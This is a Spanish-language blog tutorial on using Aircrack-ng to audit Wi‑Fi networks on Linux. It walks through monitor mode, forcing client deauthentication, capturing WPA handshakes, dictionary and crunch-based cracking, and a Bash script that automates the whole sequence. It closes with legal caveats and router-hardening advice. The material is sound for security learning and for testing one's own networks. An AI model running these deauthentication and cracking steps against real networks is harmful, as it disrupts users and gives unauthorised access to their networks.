Aircrack-ng: Guía completa para auditoría de redes Wi‑Fi en Linux

Posted on by BlockmyIP | Category: Programas Linux

Introducción

En la actualidad, la seguridad de las redes inalámbricas es un aspecto crítico tanto para usuarios domésticos como para profesionales de TI. La proliferación de dispositivos IoT, el teletrabajo y la creciente dependencia de la conectividad han aumentado la superficie de ataque de las redes Wi‑Fi. En este contexto, Aircrack-ng se ha consolidado como una de las herramientas más potentes y versátiles para realizar auditorías de seguridad en entornos Linux. Este artículo ofrece una guía exhaustiva, desde los conceptos básicos hasta técnicas avanzadas de uso, para que puedas evaluar y reforzar la protección de tus propias redes de forma responsable.

¿Qué es Aircrack-ng?

Aircrack-ng es un conjunto de utilidades de línea de comandos diseñado para detectar, capturar, analizar y intentar romper las claves de redes Wi‑Fi protegidas con los protocolos WEP, WPA, WPA2 y, de forma experimental, WPA3. El paquete incluye herramientas especializadas como airmon-ng (para colocar la interfaz en modo monitor), airodump-ng (captura de paquetes), aireplay-ng (inyectar tráfico y provocar desautenticaciones) y aircrack-ng (el motor de cracking). Gracias a su arquitectura modular, cada fase del proceso de auditoría puede ejecutarse de forma independiente o encadenada mediante scripts, lo que lo hace ideal tanto para pruebas manuales como para entornos de automatización.

Características principales

  • Soporte amplio para varios tipos de cifrado: WEP, WPA, WPA2 y WPA3 (experimental).
  • Disponible en los repositorios oficiales de la mayoría de las distribuciones Linux (Ubuntu, Debian, Fedora, Arch, openSUSE, etc.).
  • Interfaz de línea de comandos ligera, adecuada para servidores, sistemas embebidos y entornos sin entorno gráfico.
  • Gran comunidad activa, documentación extensa y numerosos tutoriales, scripts y foros de ayuda.
  • Compatibilidad con una amplia gama de adaptadores Wi‑Fi que soportan modo monitor e inyección de paquetes (chips Atheros, Realtek, ciertos Intel y Ralink).
  • Posibilidad de integrarse con otras herramientas como hashcat, crunch o pyrit para ataques más eficaces mediante GPU o rainbow tables.

Instalación en distribuciones Linux populares

Antes de instalar, verifica que tu adaptador sea compatible con modo monitor e inyección. Puedes consultar la lista de compatibilidad en la wiki oficial de Aircrack-ng o ejecutar airmon-ng para ver si aparece la interfaz.

Ubuntu / Debian

  • Actualiza el índice de paquetes: sudo apt update
  • Instala el paquete principal: sudo apt install aircrack-ng
  • Opcional, pero recomendado para compilar desde fuentes o usar drivers específicos: sudo apt install linux-headers-$(uname -r) build-essential libssl-dev

Fedora

  • Instala desde el repositorio oficial: sudo dnf install aircrack-ng
  • Para herramientas de desarrollo y compilación: sudo dnf install kernel-devel gcc make

Arch Linux

  • Usa el repositorio community: sudo pacman -S aircrack-ng
  • Si prefieres compilar la versión más reciente: git clone https://github.com/aircrack-ng/aircrack-ng.git, luego cd aircrack-ng && make && sudo make install.

Preparación de la interfaz

El primer paso consiste en colocar la tarjeta Wi‑Fi en modo monitor. Supongamos que tu interfaz se llama wlan0:

  • Detén cualquier servicio que pueda interferir con la captura: sudo airmon-ng check kill
  • Activa el modo monitor: sudo airmon-ng start wlan0
  • Esto creará una nueva interfaz, generalmente wlan0mon, lista para capturar tráfico.
  • Verifica el estado con iwconfig; deberías ver «Mode:Monitor» en la interfaz creada.

Captura de paquetes con airodump-ng

Para identificar las redes cercanas y obtener los handshakes necesarios, ejecuta:

  • sudo airodump-ng wlan0mon

Esta orden mostrará en tiempo real una tabla con BSSID, ESSID, canal, potencia de señal y clientes asociados. Anota el BSSID y el canal de la red objetivo, por ejemplo AA:BB:CC:DD:EE:FF en el canal 6.

Luego, focaliza la captura en esa red y guarda los datos en un archivo:

  • sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon

El parámetro -w define el prefijo de los archivos de salida (captura-01.cap, captura-01.csv, etc.). Mientras la captura está activa, necesitas provocar un handshake.

Obtención del handshake (WPA/WPA2)

Para forzar la reautenticación de un cliente y capturar el handshake de cuatro vías, utiliza aireplay-ng:

  • sudo aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon

El argumento -0 2 envía dos paquetes de desautenticación; -a especifica el BSSID del punto de acceso y -c la dirección MAC del cliente objetivo. Cuando el cliente se reconecte, el handshake quedará registrado en el archivo de captura.

Si no conoces la MAC de un cliente, puedes dejar el campo -c vacío; aireplay-ng enviará desautenticaciones a todos los clientes asociados, aumentando la probabilidad de capturar un handshake.

Cracking de la clave con aircrack-ng

Con el archivo de captura que contiene el handshake, puedes intentar romper la clave usando un diccionario:

  • sudo aircrack-ng -w /ruta/al/diccionario.txt captura-01.cap

Aircrack-ng probará cada contraseña del diccionario contra el handshake. Si la clave está presente, mostrará algo como:

  • KEY FOUND! [ miClaveSecreta ]

Para ataques de fuerza bruta pura (no recomendado por el tiempo requerido), puedes combinar Aircrack-ng con herramientas como crunch o hashcat. Por ejemplo, generar un diccionario de longitud 8‑10 con crunch 8 10 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt y luego pasarlo a Aircrack-ng.

Además, puedes especificar el tipo de ataque explícitamente:

  • -a 1 para WEP.
  • -a 2 para WPA/WPA2.
  • -b para filtrar por BSSID en caso de múltiples capturas.

Automatización con scripts

Para pruebas repetitivas o auditorías de múltiples redes, es útil crear scripts que encadenen las fases. Un ejemplo básico en Bash:

#!/bin/bash
INTERFAZ=wlan0mon
CANAL=6
BSSID=AA:BB:CC:DD:EE:FF
OUTPUT=ataque

# Poner en modo monitor
sudo airmon-ng start wlan0
# Capturar handshake
sudo airodump-ng -c $CANAL --bssid $BSSID -w $OUTPUT $INTERFAZ &
CAPTURE_PID=$!
# Esperar un poco para que empiece la captura
sleep 5
# Deautenticar clientes
sudo aireplay-ng -0 5 -a $BSSID $INTERFAZ
# Esperar a que se capture el handshake
sleep 15
kill $CAPTURE_PID
# Intentar crackeo
sudo aircrack-ng -w /ruta/al/diccionario.txt ${OUTPUT}-01.cap

Este script activa la interfaz, inicia la captura, envía paquetes de deautenticación y, tras un intervalo, intenta romper la clave. Puedes ampliarlo con registro de logs, notificaciones por correo o integración con herramientas de gestión de vulnerabilidades.

Solución de problemas comunes

  • La interfaz no entra en modo monitor: Verifica que el driver soporte esta funcionalidad y que no haya conflictos con NetworkManager o wpa_supplicant. Usa sudo airmon-ng check kill para detenerlos.
  • No aparecen redes en airodump-ng: Asegúrate de que la tarjeta esté realmente en modo monitor (iwconfig) y que estés en un rango adecuado; algunas tarjetas tienen sensibilidad limitada.
  • No se captura handshake: Puede deberse a la ausencia de clientes activos o a un AP que ignore las deautenticaciones. Intenta acercarte al router, usar una antena de mayor ganancia o esperar a que un dispositivo se conecte naturalmente.
  • Aircrack-ng no encuentra la clave pese a tener el handshake: Revisa que el diccionario contenga la contraseña exacta; prueba con reglas de transformación (--rules en hashcat) o combina múltiples listas.
  • Errores de permisos: La mayoría de las operaciones requieren privilegios de root; ejecuta los comandos con sudo o cambia a una sesión de root.

Consideraciones éticas y legales

Es fundamental recordar que usar Aircrack-ng en redes sin autorización explícita es ilegal y viola leyes de seguridad informática en la mayoría de los países. Esta guía está destinada exclusivamente a:

  • Auditorías de seguridad en redes propias o en aquellas donde tienes permiso escrito del propietario.
  • Entornos de laboratorio controlado para aprendizaje y certificación (por ejemplo, OSCP, CEH, GWAPT).
  • Mejorar la conciencia sobre las vulnerabilidades de las configuraciones Wi‑Fi y aplicar contramedidas adecuadas.

Siempre trabaja dentro del marco legal y respeta la privacidad de los demás.

Mejores prácticas para proteger tu red Wi‑Fi

Tras realizar tus pruebas, aplica las siguientes recomendaciones para fortalecer la seguridad:

  • Utiliza cifrado WPA3 cuando esté disponible; si no, WPA2‑AES con una contraseña larga y aleatoria (mínimo 20 caracteres).
  • Desactiva WPS, ya que puede ser explotado para obtener la PIN y derivar la clave.
  • Actualiza el firmware del router periódicamente para corregir vulnerabilidades conocidas.
  • Segmenta la red de invitados y limita el acceso a recursos críticos mediante VLAN o SSID separados.
  • Monitorea el tráfico con herramientas como Wireshark o tcpdump para detectar comportamientos anómalos.
  • Implementa filtrado de direcciones MAC como capa adicional, aunque no sea infalible, y revisa periódicamente la lista de dispositivos conectados.

Conclusión

Aircrack-ng es una herramienta esencial para cualquier profesional de la seguridad que trabaje en entornos Linux y necesite evaluar la resistencia de sus redes inalámbricas. Su combinación de utilidades para monitorización, captura, inyección y cracking ofrece un flujo de trabajo completo y flexible. Sin embargo, su poder conlleva una gran responsabilidad: úsala únicamente con permiso y dentro de los límites de la ley. Con el conocimiento adquirido en este post, estarás mejor preparado para identificar debilidades, aplicar parches y mantener tus conexiones Wi‑Fi seguras frente a amenazas externas.

Esta obra está bajo una Licencia Creative Commons Atribución 4.0 Internacional para Francesc Roig francesc@vivaldi.net .

EspañolesEspañolEspañol
EspañolesEspañolEspañolInglésenInglésEnglish